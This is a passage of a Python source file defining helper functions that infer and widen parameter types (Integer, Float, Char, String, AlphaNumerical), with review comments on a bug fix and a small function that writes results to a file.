        # BUG FIX: single-character punctuation (e.g. '#', '/') previously
        # fell through every branch and implicitly returned None; widen to
        # AlphaNumerical instead, matching the multi-character fallback.
        # NOTE(review): '/' was classified Char on first sight — confirm
        # AlphaNumerical is the intended widening here.
        return ParameterType.AlphaNumerical
    else:
        if _is_int(value):
            return ParameterType.Integer
        if _is_float(value):
            return ParameterType.Float
        else:
            return ParameterType.AlphaNumerical
247 |
def _handle_float(value):
    """Widen a previously-Float parameter: numeric stays Float, any other
    string becomes AlphaNumerical; non-string non-numerics are rejected."""
    if _is_float(value) or _is_int(value):
        return ParameterType.Float
    if isinstance(value, str):
        return ParameterType.AlphaNumerical
    raise ValueError("{}".format(value))
255 |
256 |
def _handle_char(value):
    """A single character stays Char; anything longer widens to AlphaNumerical."""
    return ParameterType.Char if len(value) == 1 else ParameterType.AlphaNumerical
262 |
def _handle_integer(value):
    """Widen a previously-Integer parameter: int stays Integer, other numerics
    become Float, everything else AlphaNumerical."""
    if _is_int(value):
        return ParameterType.Integer
    if _is_float(value):
        return ParameterType.Float
    return ParameterType.AlphaNumerical
270 |
def _handle_string(value):
    """A previously-String parameter becomes AlphaNumerical as soon as a
    value containing a digit shows up; otherwise it stays String."""
    return ParameterType.AlphaNumerical if _has_number(value) else ParameterType.String
276 |
def print_to_file(self, item, filename):
    """Write *item* to ``result/<filename>``, creating the directory if needed.

    NOTE(review): *self* is unused — this module-level function apparently
    kept a method signature; the parameter is retained so existing callers
    keep working.
    """
    # FIX: ensure the output directory exists and close the file even when
    # the write raises (the original leaked the handle on error).
    os.makedirs("result", exist_ok=True)
    with open("result/" + filename, "w") as f:
        f.write(item)
--------------------------------------------------------------------------------
|